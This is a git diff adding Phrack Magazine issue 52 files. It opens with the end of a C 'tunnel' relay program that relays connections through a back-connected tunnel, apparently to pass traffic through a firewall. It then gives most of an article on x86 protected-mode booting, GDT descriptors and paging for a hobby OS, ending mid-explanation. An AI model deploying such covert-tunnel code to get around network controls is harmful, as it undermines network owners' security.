+	  " connections\n");
+  fprintf(stderr,"remote_port is the port where we accept the tunnel" \
+	  " to connect\n");
+  fprintf(stderr,"Coded by %s\n",AUTHOR);
+}
+
+/********************** Get the options ***********************/
+
+extern int optind;
+extern char *optarg;
+
+void get_options(int argc,char *argv[]){
+  int c;
+  while((c=getopt(argc,argv, "l:")) !=-1)
+    switch(c){
+    case 'l':
+      if(!(log=fopen(optarg,"w"))){
+	log=stdout;
+	fprintf(log,"Unable to open logfile '%s':%s\n",
+		optarg,strerror(errno));
+      }
+      break;
+    case '?':
+    default:
+      usage();
+      exit(-1);
+    }
+  /* the two next options*/
+  if(argc-optind!=2){
+    printf("Wrong number of options!\n");
+    usage();
+    exit(-1);
+  }
+  local_port=atoi(argv[optind++]);
+  tunnel_port=atoi(argv[optind++]);
+  if(local_port<1||local_port>65535||tunnel_port<1||tunnel_port>65535){ 
+    printf("Ports below 1 and above 65535 dont give any sense\n"); 
+    usage(); 
+    exit(-1);
+  } 
+}
+
+/*********************************************************/
+/*************** Portal                  *****************/
+/*********************************************************/
+
+void open_local_port(){
+  /*Open the local port for incoming connections*/
+  struct sockaddr_in ser;
+  int opt=1;
+  local_sock=socket(AF_INET,SOCK_STREAM,0);
+  if(local_sock==-1){fprintf(log,"Error opening socket\n");exit(0);}
+  if(setsockopt(local_sock,SOL_SOCKET,SO_REUSEADDR,
+		(char *)&opt,sizeof(opt))<0)
+    {perror("setsockopt REUSEADDR");exit(1);}
+  ZERO((char *) &ser,sizeof(ser));
+  ser.sin_family      = AF_INET;
+  ser.sin_addr.s_addr = htonl(INADDR_ANY);
+  ser.sin_port        = htons(local_port);
+  if(bind(local_sock,(struct sockaddr *)&ser,sizeof(ser)) ==-1 ){
+    fprintf(log,"Error binding to local port %d : %s\n"
+	    ,local_port,strerror(errno));
+    exit(-1);
+  }
+  if(listen(local_sock,5)==-1){
+    fprintf(log,"Error listening to local port %d : %s"
+	    ,local_port,strerror(errno));
+    exit(-1);
+  }
+  fprintf(log,"Opened local port %d on socket %d\n",local_port,local_sock);
+}
+
+void open_portal(){
+  int opt=0;
+  struct sockaddr_in ser;
+  if((tunnel_basesock=socket(AF_INET,SOCK_STREAM,0))==-1)
+    {perror("socket");exit(-1);}
+  if(setsockopt(tunnel_basesock,SOL_SOCKET,SO_REUSEADDR,
+		(char *)&opt,sizeof(opt))<0)
+    {perror("setsockopt REUSEADDR");exit(-1);}
+  ZERO((char *) &ser,sizeof(ser));
+  ser.sin_family      = AF_INET;
+  ser.sin_addr.s_addr = htonl(INADDR_ANY);
+  ser.sin_port        = htons(tunnel_port);
+  if(bind(tunnel_basesock,(struct sockaddr *)&ser,sizeof(ser)) ==-1 ){
+    fprintf(log,"Error binding to tunnel port %d : %s\n"
+	    ,tunnel_port,strerror(errno));
+    exit(-1);
+  }
+  if(listen(tunnel_basesock,5)==-1){
+    fprintf(log,"Error listening to tunnel port %d : %s"
+	    ,tunnel_port,strerror(errno));
+    exit(-1);
+  }
+}
+
+int accept_portal(){
+  struct hostent *from;
+  struct sockaddr_in cli;
+  int newsock,clilen;
+  clilen=sizeof(cli);
+  if(!tunnel_basesock){return(-1);}
+  /*Accept incoming calls*/
+  newsock=accept(tunnel_basesock,(struct sockaddr *)&cli,&clilen);
+  /*We want to know  know our remote host better*/
+  from=gethostbyaddr((char *)(&cli.sin_addr),sizeof(cli.sin_addr),PF_INET);
+  if(!from){
+    close(newsock);
+    return(-1);
+  }
+  fprintf(log,"Tunnel connection from:%s %d\n",from->h_name,cli.sin_port);
+  return(newsock);
+}
+
+void close_portal(){
+  shutdown(tunnel_sock,1);
+  close(tunnel_sock);
+}
+
+struct connection *receive_local(){
+  struct sockaddr_in cli;
+  int newsock,clilen;
+  struct hostent *from;
+  struct connection *con;
+  clilen=sizeof(cli);
+  /*Accept incoming calls*/
+  newsock=accept(local_sock,(struct sockaddr *)&cli,&clilen);
+  if(newsock==-1)
+    {fprintf(log,"Server Accept Error:%s\n",strerror(errno));exit(-1);}
+  /*We want to know  know our remote host better*/
+  from=gethostbyaddr((char *)(&cli.sin_addr),sizeof(cli.sin_addr), PF_INET);
+  fprintf(log,"New connection from:%s %d\n",from->h_name,cli.sin_port);
+  /*Add our new friend to our list of connections*/
+  connections.num++;
+  con=(struct connection *)malloc(sizeof(struct connection));
+  con->host=strdup(from->h_name);
+  con->port=cli.sin_port;
+  con->local_sock=newsock;
+  con->remote_sock=0;
+  con->time=time(NULL);
+  con->next=connections.head;
+  connections.head=con;
+  descriptors[newsock]=con;
+  return(con);
+}
+
+void alive(){
+  /* If we don't get a ping from the tunnel
+     every ALIVE_TIME*2 we disconnect the connection to the
+     tunnel, and wait for a new.  If the tunnel has not died, all
+     the connections from the tunnel will continue as normal once
+     the connection has been established again*/
+  if(time(NULL)-ping_time>ALIVE_TIME*2){
+    printf("Connection to tunnel probably lost, hanging up.\n");
+    shutdown(tunnel_sock,2);
+    close(tunnel_sock);
+    tunnel_sock=-1;
+  }
+}
+
+int reset_selector(fd_set *selector,fd_set *errsel,struct connection *con){
+  /* We tell the selector to look on the tunnel socket aswell 
+     as our live connections, and the connection socket.*/
+  int maxsock,i;
+  FD_ZERO(selector);
+  FD_SET(local_sock,selector);
+  FD_SET(tunnel_sock,selector);
+  FD_SET(local_sock,errsel);
+  FD_SET(tunnel_sock,errsel);
+  con=connections.head;
+  maxsock=max(local_sock,tunnel_sock);
+  for(i=0;i<connections.num;i++,con=con->next){
+    FD_SET(con->local_sock,selector);
+    FD_SET(con->local_sock,errsel);
+    maxsock=max(maxsock,con->local_sock);
+  }
+  return(maxsock);
+}
+
+void check_tunnel_connection(fd_set *selector,fd_set *errsel,struct connection *con){
+  /*Here we check the tunnel for incoming data*/
+  if(FD_ISSET(tunnel_sock,errsel)){
+    fprintf(log,"Tunnel connection terminated!\n");
+    shutdown(tunnel_sock,2);
+    close(tunnel_sock);
+    tunnel_sock=-1;
+    return;
+  }
+  if(FD_ISSET(tunnel_sock,selector)){
+    if(receive_tunnel()!=-1){
+      if(tunnel_src==0&&tunnel_des==0){ /*We got a Myping*/
+	ping_time=time(NULL);
+	/* Ping the tunnel back!*/
+	transmit_tunnel(buf,0,0,0); /*Send a Myping back*/
+      }
+      else if(tunnel_des){
+	if(descriptors[tunnel_des]){
+	  con=descriptors[tunnel_des];
+	  if(tunnel_src!=0){
+	    con->remote_sock=tunnel_src;
+	    writen(descriptors[tunnel_des]->local_sock,tunnel_buf,tunnel_size);
+	  }
+	  else{
+	    printf("Hangup signal received. Removing connection to %s %d\n",con->host,con->port);
+	    removeconnection(con);
+	  }
+	}
+      }
+    }
+  }
+}
+
+void check_connection_port(fd_set *selector,fd_set *errsel,struct connection *con){
+  /*Here we check the connection port for new connections*/
+  if(FD_ISSET(local_sock,selector)){
+    con=receive_local();
+    if(con){
+      printf("Transmitting the new connection\n");
+      *((int *)(&buf[4]))=htonl(con->port);
+      strncpy(&buf[8],con->host,MAX_HOSTNAME_SIZE);
+      *(&buf[8]+strlen(con->host))=0;
+      transmit_tunnel(buf,4+min(strlen(con->host)+1,MAX_HOSTNAME_SIZE),con->local_sock,0);
+    }
+  }
+}
+
+void main(int argc,char **argv){
+  get_options(argc,argv);
+  init_descriptors();
+  connections.num=0;
+  connections.head=NULL;
+  remote_machine=get_ip(argv[2]);
+  fprintf(log,"Tunneling incoming calls on port %d to port %d \n"
+	  ,local_port,tunnel_port);
+  connections.num=0;
+  connections.head=NULL;
+  fprintf(log,"Opening portal\n");
+  open_portal();
+  signal(SIGINT,ctrlC);
+  fprintf(log,"Opening localport\n");
+  open_local_port();
+  while(1){
+    fprintf(log,"Waiting for tunnel connection on port %d\n",tunnel_port);
+    while((tunnel_sock=accept_portal())==-1) sleep(4);
+    ping_time=time(NULL);
+    while(tunnel_sock!=-1){
+      fd_set selector,errsel;
+      struct connection *con=NULL;
+      struct timeval alive_time;
+
+      alive_time.tv_sec=ALIVE_TIME;
+      alive_time.tv_usec=0;
+      alive();
+
+      /* We have to listen to the tunnel, the local port, and alle the
+	 current connections. */
+      if(select(reset_selector(&selector,&errsel,con)+1,
+		&selector,NULL,&errsel,&alive_time)){
+	check_tunnel_connection(&selector,&errsel,con);
+	check_connection_port(&selector,&errsel,con);
+	check_local_connections(&selector,&errsel,con);
+      }
+    }
+    sleep(2);
+  }
+}
+<-->
+<++> tunnel/share.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h> 
+#include <netinet/in.h> 
+#include <arpa/inet.h> 
+#include <sys/socket.h> 
+#include <sys/time.h> 
+#include <sys/utsname.h> 
+#include <fcntl.h> 
+#include <string.h>
+#include <signal.h>
+#include <errno.h>
+#include <netdb.h> 
+
+#include "share.h"
+
+char tunnel_buf[MAXLEN*2];  /*Buffer to store the tunnel data in*/
+int tunnel_des;             /*Destination socket */
+int tunnel_src;             /*Source socket*/
+int tunnel_size;            /*Size of the data currently in the buffer*/
+int tunnel_sock;            /*The socket of the portal*/
+int tunnel_port;            /*The port we wan't to run on*/
+
+extern FILE *log;           /* Our log file*/ 
+extern int errno;          
+struct connection *descriptors[DESC_MAX];
+struct connections connections; /*A linked list of our connections*/
+
+/*
+Packet header:
+####################################/
+# Dest  # Source#   Data size   #  /   data comes here
+###################################\
+ 1 byte  1 byte    2 bytes
+
+If the sestination field is zero, we are initiating a new connection
+If the source field we are dropping a connection
+If both the destination and the source is zero, it is a Myping packet.
+*/
+
+void ctrlC(int sig)
+{
+  fprintf(log,"Shutting down the hard way\n");
+  shutdown(tunnel_sock,2);
+  close(tunnel_sock);
+  exit(-1);
+}
+
+
+char *get_ip(char *host){
+  struct hostent *remote;
+  struct in_addr *in;
+  remote=gethostbyname(host);
+  if(remote==NULL){
+    fprintf(log,"Hostinformation of remote machine '%s' not resolved,"\
+	    " reason:%s",host,strerror(errno));
+    exit(-1);
+  }
+  in=(struct in_addr *)remote->h_addr_list[0];
+  return(strdup(inet_ntoa(*in)));
+}
+
+int transmit_tunnel(char *data,int size,int source,int destination){
+  int nleft=size+4,nwritten;
+  fd_set selector,errsel;
+  data[0]=(unsigned char)destination; /*Destination into header*/
+  data[1]=(unsigned char)source;      /*Source into header*/
+  *((u_short *)&data[2])=htons(size); /*Size into header*/
+  while(nleft>0){
+    FD_ZERO(&errsel);
+    FD_ZERO(&selector);
+    FD_SET(tunnel_sock,&errsel);
+    FD_SET(tunnel_sock,&selector);
+    select(tunnel_sock+1,NULL,&selector,&errsel,NULL);
+    if(FD_ISSET(tunnel_sock,&errsel)){
+      printf("Big bug\n");
+    }
+    nwritten=write(tunnel_sock,data,nleft);
+    if(nwritten==-1){
+      fprintf(log,"Error writing to tunnel:%s\n",strerror(errno));
+      tunnel_sock=-1;
+      return(nwritten);
+    }
+    else if(nwritten==0){
+      fprintf(log,"Error: Wrote zero bytes in transmit_tunnel\n");
+      return(nwritten);
+    }
+    nleft-=nwritten;
+    data+=nwritten;
+  }
+  return(size - nleft);
+}
+
+int receive_tunnel(){
+  static int received=0;
+  int n,left,got=0,quit=0,sofar=0;
+  received++;
+  while(sofar<4){
+    quit=0;
+    while(!quit){
+      n=read(tunnel_sock,&tunnel_buf[sofar],4-sofar);
+      if(n>0){quit=1;sofar+=n;}
+      if(n<1){
+	fprintf(log,"Connection terminated!\n");
+	shutdown(tunnel_sock,2);
+	close(tunnel_sock);
+	tunnel_sock=-1;
+	return(-1);
+      }
+    }
+  }
+  tunnel_des=tunnel_buf[0]; /*Fetch the destination*/
+  tunnel_src=tunnel_buf[1]; /*Fetch the source*/
+  tunnel_size=ntohs(*((u_short *)&tunnel_buf[2])); /*Fetch the size*/
+  left=tunnel_size;
+  while(left!=0){ 
+    n=read(tunnel_sock,&tunnel_buf[got],left);
+    if(n<0){
+      fprintf(log,"Connection terminated in receive_tunnel!\n");
+      shutdown(tunnel_sock,2);
+      close(tunnel_sock);
+      tunnel_sock=-1;
+      return(-1);
+    }
+    got+=n;
+    left-=n; 
+  } 
+  return(n);
+}
+void check_local_connections(fd_set *selector,fd_set *errsel,struct connection *con){
+  /*Here we check each of the local connections for incoming date*/
+  char buf[MAXLEN*2];
+  int i,n;
+  con=connections.head;
+  for(i=0;i<connections.num&&con;i++,con=con->next){
+    if(FD_ISSET(con->local_sock,errsel)){
+	fprintf(log,"LLocal connection terminated\n");
+	fprintf(log,"Removing connection to %s %d\n",con->host,con->port);
+	if(con->remote_sock) transmit_tunnel(buf,0,0,con->remote_sock);
+	removeconnection(con);
+	break;
+    }
+    if(FD_ISSET(con->local_sock,selector)&&con->remote_sock){
+      n=read(con->local_sock,&buf[4],MAXLEN);
+      if(n<1){
+	fprintf(log,"Local connection terminated\n");
+	fprintf(log,"Removing connection to %s %d\n",con->host,con->port);
+	transmit_tunnel(buf,0,0,con->remote_sock);
+	removeconnection(con);
+	break;
+      }
+      /*forward the data to the tunnel*/
+      transmit_tunnel(buf,n,con->local_sock,con->remote_sock);
+    }
+  }
+}
+
+void ZERO(char * buf,int size){int i=0;while(i<size)buf[i++]=0;}
+
+int writen(int fd, char *ptr, int nbytes)
+{
+  int nleft=nbytes,nwritten;
+  while(nleft>0){
+    nwritten=write(fd,ptr,nleft);
+    if(nwritten<=0) return(nwritten);
+    nleft-=nwritten;
+    ptr+=nwritten;
+  }
+  return(nbytes - nleft);
+}
+
+int remote_connect(char *machine,int port)
+{
+  int sock;
+  struct sockaddr_in ser;
+  ZERO((char *) &ser,sizeof(ser));
+  ser.sin_family      = AF_INET;
+  ser.sin_addr.s_addr = inet_addr(machine);
+  ser.sin_port        = htons(port);
+  sock=socket(AF_INET,SOCK_STREAM,0);
+  if(sock==-1){perror("Error opening socket\n");return(-1);}
+  if(connect(sock,(struct sockaddr *) &ser,sizeof(ser))==-1){
+    fprintf(log,"Can't connect to server:%s\n",strerror(errno));
+    return(-1);
+  }
+  return(sock);
+}
+
+void disconnect(struct connection *con,int sock1,int sock2){
+  fprintf(log,"Closing link to: %s %d\n",con->host,con->port);
+  shutdown(sock1,2);
+  shutdown(sock2,2);
+  close(sock1);
+  close(sock2);
+  close(con->local_sock);
+}
+
+void init_descriptors(){
+  int i;
+  for(i=0;i<DESC_MAX;i++){
+    descriptors[i]=NULL;
+  }
+}
+
+void removeconnection(struct connection *con){
+  struct connection *c2,*c=connections.head;
+  if(c==con){
+    connections.head=c->next;
+    descriptors[c->local_sock]=NULL;
+    free(c->host);
+    shutdown(c->local_sock,2);
+    close(c->local_sock);
+    free(c);
+    connections.num--;
+    return;
+  }
+  c2=c;
+  c=c->next;
+  while(c){
+    if(c==con){
+      /* connections.head=c2; */
+      c2->next=c->next;
+      descriptors[c->local_sock]=NULL;
+      free(c->host);
+      shutdown(c->local_sock,2);
+      close(c->local_sock);
+      free(c);
+      connections.num--;
+      return;
+    }
+    c2=c;
+    c=c->next;
+  }
+}
+<-->
+<++> tunnel/share.h
+/*********************/
+/* Structs & Defines */
+/*********************/
+#define MAX_HOSTNAME_SIZE 128
+#define MAXLEN 32768  /*Maximum length of our data*/
+#define ALIVE_TIME 60 /*Time to wait before sending a Myping*/
+#define DESC_MAX 128  /*Maximum number of descriptors used*/
+#define RETRY_TIME 60 /* Time to wait before we reconnect to portal*/
+#define max(a,b) ((a>b)?a:b)
+#define min(a,b) ((a<b)?a:b)
+#define AUTHOR "bishnu@hotmail.com"
+
+struct connections{
+  int num;
+  struct connection *head;
+};
+
+struct connection{
+  struct connection *next;
+  int port;
+  int local_sock;
+  int remote_sock;
+  time_t time;
+  char *host;
+};
+
+
+char *get_ip(char *host);
+
+void random_delay(int n);
+int transmit_tunnel(char *data,int size,int source,int destination);
+int receive_tunnel();
+void hostname(char *name); 
+void ZERO(char * buf,int size);
+int writen(int fd, char *ptr, int nbytes);
+void ctrlC(int sig);
+void sleep_usec(int n);
+void    nonblock(int s);
+int remote_connect(char *machine,int port);
+void disconnect(struct connection *con,int sock1,int sock2);
+void init_descriptors();
+int max_descriptor();
+void removeconnection(struct connection *con);
+void check_local_connections(fd_set *selector,fd_set *errsel,struct connection *con);
+<-->
+
+
+----[  EOF
+
diff --git a/phrack52/17.txt b/phrack52/17.txt
new file mode 100644
index 0000000..129a79a
--- /dev/null
+++ b/phrack52/17.txt
@@ -0,0 +1,1452 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 17 of 20
+
+
+-------------------------[  Protected mode programming and O/S development
+
+
+--------[  Mythrandir <jwthomp@cu-online.com>
+
+
+
+
+----[  Forward
+
+
+About two months ago I decided to begin learning about developing an operating
+system from the ground up.  I have been involved in trusted operating systems
+development for over two years now but have always done my work with
+pre-existing operating systems.  Mucking with this driver model, deciphering
+that streams implementation, loving this, hating that.  I decided it was time
+to begin fresh and start really thinking about how to approach the design
+of one, so that I would be happy with every part.  At least if I wasn't, I
+would only be calling myself names.
+
+This article is the first tentative step in my development of an operating
+system.  What is here is not really much of a kernel yet.  The big focus of
+this article will be getting a system up and running in protected mode with a
+very minimal kernel.  I stress minimal.  I have been asked repeatedly what my
+design goals for this operating system are.  The fact is the operating system
+itself was the goal for this part.  There was simply to much that I didn't
+know about this stage of the development to go on designing something.  It
+would be like asking a kindergarten fingerpainter what her final masterpiece
+was going to look like.
+
+However, now that I have this phase reasonably done, it is time to begin
+thinking about such issues as: a security subsystem, a driver subsystem, as
+well as developing a real task manager and a real memory manager.  Hopefully,
+by the next phrack I will be able to not only answer what I want for these
+topics but have also implemented many of them.  This will leave me with a much
+more solid kernel that can be built upon.
+
+So, why write this article?  There are several reasons.  First, writing down
+what you have done always help solidify your thoughts and understanding.
+Second, having to write an article imposes a deadline on me which forces me to
+get the job done.  Finally, and most importantly I hope to give out enough
+knowledge that others who are interested in the subject can begin to do some
+work in it.
+
+One comment on the name.  JeffOS is not going to be the final name for this OS.
+In fact several names have been suggested.  However, I have no idea yet what I
+want to call it, mostly because it just isn't solidified enough for a name.
+When its all said and done, I do hope I can come up with something better than
+JeffOS.  For now, getting a real working kernel is more important than a real
+working name.
+
+I hope that you find the following information interesting, and worth
+investigating further.
+
+Cheers,
+Jeff Thompson
+AKA Mythrandir
+
+
+PS: Some words on the Cryptography article.  First a thank you for all of the
+letters that I received on the article.  I am happy to find that many people
+found the article interesting.  For several people it rekindled an old interest
+which is always great to hear.  However, for several people I have unfortunate
+news as well.  The next article in the series will have to be postponed for
+a few issues until I complete this operating system.  As is with many people,
+I have been caught by a new bug (The OS bug) and have set myself up to be
+committed to the work for some time.  I am of course still interested in
+discussing the topic with others and look forward to more email on the subject.
+
+
+The winners of the decryption contest were:
+
+1st message:
+1st) Chaos at chaos@vector.nevtron.si
+2nd) Oxygen at oxygen@james.kalifornia.com
+
+Solution:
+The baron's army will attack at dawn. Ready the Templar knights and strike his
+castle while we hold him.
+
+2nd message:
+
+1st) Chaos
+
+Solution:
+MULTICAST PROTOCOLS HAVE BEEN DEVELOPED TO SUPPORT GROUP COMMUNICATIONS
+THESE PROTOCOLS USE A ONE TO MANY PARADIGM FOR TRANSMISSION TYPICALLY
+USING CLASS D INTERNET PROTOCOL ADDRESSES TO SPECIFY SPECIFIC MULTICAST GROUPS
+
+Also, there is one typo in my article.  The book which was written without the
+letter 'e' was not The Great Gatsby, but rather Gadsby.  Thanks to Andy
+Magnusson for pointing that out.
+
+
+Great job guys!
+
+
+----[  Acknowledgements
+
+
+I owe a certain debt to two people who have been available to me during my
+development work.  Both have done quite a bit of work developing their own
+protected mode operating systems.  I would like to thank Paul Swanson of the
+ACM@UIUC chapter for helping solve several bugs and for giving me general tips
+on issues I encountered.  I would also like to thank Brian Swetland of
+Neoglyphics for giving me a glimpse of his operating system.  He was also nice
+enough to allow me to steal some of his source code for my use.  This source
+include the console io routines which saved me a great deal of time.  Also,
+the i386 functions were given to me by Paul Swanson which has made a lot of
+the common protected mode instructions easily useable.
+
+Following new releases and information on this operating systems work, I am
+currently redoing my web site and will have it up by Feb 1, 1998.  I will be
+including this entire article on that site along with all updates to the
+operating system as I work on it.  One of the first things that I will be
+doing is rewriting all of the kernel.  A large part of what is contained
+within these pages was a learning experience.  Unfortunately, one consequence
+of trying to get this thing done was it becoming fairly messy and hackish.  I
+would like to clean it up and begin to build upon it.  Having a good code base
+will be invaluable to this.  So please watch for the next, and future releases
+of this code and feel free to contact me with any feedback or questions.  I
+will do my best to help.  I won't be able to answer every question but I will
+certainly try.  Also, please be patient as I have a very busy schedule outside
+of this project and am often times caught up by it.
+
+I can be reached at:
+        jwthomp@cu-online.com
+and my web site is at:
+        http://www.cu-online.com/~jwthomp/ (Up Feb 1, 1998)
+
+
+----[  Introduction
+
+
+Throughout this document I assume a certain level of knowledge on the part of
+the reader.  This knowledge includes c and assembly language programming, and
+x86 architecture.
+
+The development requirements for the GuildOS operating system are:
+
+An ELF compiler
+    I used the gnu ELF compiler which comes with linux.  It is possible to use
+    other ELF cross compilers on other systems as well.
+
+a386 assembler
+    This can be obtained from:
+
+    Eric Isaacson
+    416 E. University Ave.
+    Bloomington IN 47401-4739
+    71333.3154@compuserve.com
+
+    or call 1-812-335-1611
+    A86+D86+A386+D386 is $80
+    Printed manual $10
+
+    This is a really nice assembler.  Buy a copy.  I did.
+
+    It is also possible to convert the boot loader assembly code to another
+    assembler.
+
+A 486+ machine
+    You must have a machine to test the OS on.
+
+Great books to read to gain an understanding of the various topics presented
+in the following pages are:
+
+Protected Mode Software Architecture by Tom Shanley from MindShare, Inc.
+ISBN 0-201-55447-X  $29.95 US
+
+This book covers the protected mode architecture of the x86.  It also explains
+the differences between real mode and protected mode programming.  This book
+contains much of the information which is in the Intel Operating Systems
+Developers guide, but also explains things much more in depth.
+
+
+Developing Your Own 32-Bit Operating System by Richard A. Burgess from SAMS
+Publishing.  ISBN  0-672-30655-7
+
+This book covers the development of a complete 32-bit OS.  The author also
+creates his own 32-bit assembler and compiler.  Considerable portions of the
+code are written in asm, but there is still quite a bit in C.
+
+The entire Intel architecture series and their OS developers guides which are
+available from their web site for free.
+
+
+----[  Chapter 1 - Booting into protected mode
+
+
+The first step in setting up an operating system on the x86 architecture is to
+switch the machine into protected mode.  Protected mode allows you to use
+hardware protection schemes to provide operating system level security.
+
+The first component which I began working on was the first stage boot loader
+which is located in "JeffOS/loader/first/".
+
+The first stage boot loader is placed on the first sector of the floppy.  Each
+sector is 512 bytes.  This is not a lot of room to write all of the code
+required to boot into protected mode the way I would like to so I had to break
+the boot loader into two parts.  Thus the first and second stage floppy loader.
+
+After the Power On Self-Test (POST) test this first sector is loaded up into
+memory location 0000:7C00.  I designed the first stage of the floppy boot
+loader to load up all of the files into memory to be executed.  The first
+instruction in the boot loader jumps to the boot code.  However, between the
+jump and the boot code are some data structures.  
+
+The first section is the disk parameters.  I'm not currently using any of this
+information but will in future versions.  The next set of structures contain
+information on the other data files on the floppy disk.  Each structure looks
+like this in assembly:
+
+APCX	DW	0000h		; Specifies CX value for INT 13h BIOS routine
+APDX	DW	0000h		;           DX
+APES	DW	0000h		;           ES
+APBX	DW	0000h		;           BX
+APSZ	DB	0h		; Specifies number of sectors to read in
+APSZ2	DB	0h		; Unused
+
+There are four copies of this structure (APxx, BPxx, CPxx, DPxx).
+
+The INT 13h BIOS call has the following arguments:
+
+ch: Cylinder number to start reading from.
+cl: Sector number to start at.
+dh: Head number of drive to read from (00h or 01h for 1.44M floppy disk drives)
+dl: Drive number (00h for Disk A)
+es: Segment to store the read in sectors at.
+bx: Offset into the segment to read the sectors into.
+ah: Number of sectors to read in.
+al: Function number for INT 13h. (02h is to read in from the disk)
+
+I use the APxx to load the second stage boot loader. BPxx is being used
+to load the first stage kernel loader.  CPxx is used to load a simple user
+program.  Finally, DPxx is used to load the kernel in.
+
+Following the loader structures are two unused bytes which are used to store
+temporary data. SIZE is used but SIZE2 is not currently used.
+
+The boot code follows these structures.  This boot code relocates itself into
+another section of memory (9000:0000 or 90000h linear).  Once relocated, it
+loads all of the files into memory and then jumps into the beginning of the
+second stage boot loader.
+
+The first part of the second stage boot loader contains a macro which is used
+to easily define a Global Descriptor Table (GDT) entry.  In protected mode the
+GDT is used to store information on selectors.  A selector in protected mode
+is referred to by a number stored in any of the segment registers.  A selector
+has the following format:
+
+Bits        Use
+15 - 3      Descriptor Table Index
+2           Table Indicator
+1  - 0      The Requestor Privilege Level
+
+The Descriptor Table Index or (DT) is an index into the GDT.  The first entry
+in the GDT is 00h, the second is 08h, then 10h, etc..  The reason that the
+entries progress in this manner is because the 3 least significant bits are
+used for other information.  So to find the index into the GDT you do a
+segment & 0xfff8 (DT = Selector & 0xfff8).
+
+The Table Indicator selects whether you are using a GDT or a Local Descriptor
+Table (LDT).  I have not yet had a reason to use LDT's so I will leave this
+information to your own research for now.
+
+Finally, the Requestor Privilege Level is used to tell the processor what
+level of access you would like to have to the selector.
+0 = OS
+1 = OS (but less privileged than 0)
+2 = OS (but less privileged than 1)
+3 = User level
+
+Typically levels 0 and 3 are the only ones used in modern operating systems.
+
+The GDT entries which describe various types of segments have the following
+form:
+
+63 - 56    Upper Byte of Base Address
+55         Granularity Bit
+54         Default Bit
+53         0
+52         Available for Use (free bit)
+51 - 48    Upper Digit of Limit
+47         Segment Present Bit
+46 - 45    Descriptor Privilege Level
+44         System Bit
+43         Data/Code Bit
+42         Conforming Bit
+41         Readable bit
+40         Accessed bit
+39 - 32    Third Byte of Base Address
+31 - 24    Second Byte of Base Address
+23 - 16    First Byte of Base Address
+15 - 8     Second Byte of Limit
+7 - 0      First Byte of Limit
+
+
+The base address is the starting location of the segment descriptor (for code
+or data segments). The limit is the number of bytes or 4k pages.  Whether it
+is bytes or 4k pages depends on the setting of the granularity but.  If the
+granularity bit is set to 0 then the limit specifies the length in bytes.  If
+it is set to 1 then the limit specifies the length of the segment in 4k pages.
+
+The default bit specifies whether the code segment is 32bit or 16bit.  If it is
+set to 0 then it is 16bit.  If it is set to 1 then it is 32bit.
+
+The present bit is set to one if the segment is currently in memory.  This is
+used for virtual paging.
+
+The descriptor privilege level is similar to the RPL.  The DPL simply states at
+what protection level the segment exists at.  The values are the same as for
+the RPL.
+
+The system bit is used to specify whether the segment contains a system segment.
+It is set to 0 if it is a system(OS) segment.
+
+The data/code bit is used to specify whether the segment is to be used as a
+code segment or as a data segment.  A code segment is used to execute code
+from and is not writable.  A data segment is used for stacks and program
+data.  It's format is slightly different from the code segment depicted above.
+
+The readable bit is used to specify whether information can be read from the
+segment or whether it is execute only.
+
+The next part of the second stage floppy boot loader contains the code which
+is used to enable the A20 address line.  This address line allows you to
+access beyond the 1MB limit that was imposed on normal DOS real mode
+operation. For a discussion of this address line I recommend looking at the
+Intel architecture books.
+
+Once enabled the GDT that exists as data at the end of the assembly file is
+loaded into the GDT register. This must be done before the switch into
+protected mode.  Other wise any memory accesses will not have a valid selector
+described for them and will cause a fault (I learned this from experience).
+
+Once this is completed the move is made to protected mode by setting the
+protected mode bit in the CR0 register to 1.
+
+Following the code which enables protected mode, there is data which represents
+a far call into the next portion of the second stage boot loader.  This causes
+a new selector to be used for CS as opposed to an undefined one.
+
+The code that is jumped into simply sets up the various selectors for the data
+segments.
+
+There is then some simple debugging code which prints to the screen.  This was
+used for myself and can be removed.
+
+The stack segment is then set up along with the stack pointer.  I placed the
+stack at 90000h.
+
+Finally I push the value for the stack onto the stack (to be retrieved by the
+kernel) and then call linear address 100080h which contains the first stage
+loader for the kernel.
+
+
+----[  Chapter 2 - The first stage kernel boot loader
+
+
+The first stage kernel boot loader is located in \boot.
+
+First some notes on what is happening with the first stage boot loader.  The
+boot loader is compiled to ELF at a set TEXT address so that I can jump into
+the code and have it execute for me.  In the makefile I specify the text
+address to be 10080.  The first 80h bytes are used as the ELF header.  I
+completely ignore this information and jump directly into linear memory
+address 10080h.  It is my understanding that newer versions of the ELF compiler
+have a slightly different header length and may cause this number to need to be
+modified.  This can be determined by using a dissasembler (i.e. DEBUG in DOS)
+to determine where the text segment is beginning.
+
+The two files of importance to the boot loader are main.c and mem.c.
+
+main.c contains the function `void _start(unsigned long blh);`.  This function
+must be the first function linked in.  So main.c must be the first file which
+is linked and _start() must be the first function in it.  This guarantees that
+start will be at 10080h.  The parameter blh is the value which was pushed in
+by the second stage boot loader.  This originally had meaning, but no longer
+does.
+
+The first thing that _start does is to call kinit_MemMgmt which is the
+initialization routine for memory.
+
+The first thing that kinit_MemMgmt does is set nMemMax to 0xfffff.  This is
+the maximum number of bytes on the system.  This value is 1MB.  kinit_MemMgmt
+then calls kmemcount which attempts to calculate the amount of free memory on 
+the system.  Currently this routine does not work properly and assumes that
+there is 2MB of free memory on the system.  This is sufficient for now but
+needs to be fixed in the future.
+
+kinit_MemMgmt then calls kinit_page which sets of the page tables for the
+kernel. 
+
+Paging is the mechanism used to define what memory a task is able to access.
+This is done by creating a "virtual" memory space which the task accesses.
+Whenever an access to memory occurs the processor looks into the page tables
+to determine what "real" physical memory is pointed to by this memory location.
+For example, the kernel could designate that each task will get 32k (8 pages)
+of memory to use for the stack.  Without using paged memory each of these
+memory locations would occur at a different address.  However, by using paging
+you can map each of these physical memory allocations to a paged address
+which allows each of these allocations to appear to occur at the same location.
+
+The page tables are broken up in the following manner.  First is the page
+directory.  It is composed of 1024 entries which have the following properties:
+
+31 - 12    Page Table Base Address
+11 - 9     Unused (Free bits)
+8          0
+7          Page Size Bit
+6          0
+5          Accessed Bit
+4          Page Cache Disable Bit
+3          Page Write Through Bit
+2          User/Supervisor Bit
+1          Read/Write Bit
+0          Page Present Bit
+
+The Page Table Base address is an index to the page table which contains
+information about this memory location. When a memory location is accessed
+the most significant 10 bits are used to reference one of the 1024 entries in 
+the page directory. This entry will point to a page table which has a physical
+memory address equal to the Page Table Base Address.  This table is then 
+referenced to one of its 1024 entries by the 21 - 12 bits of the memory
+address.
+
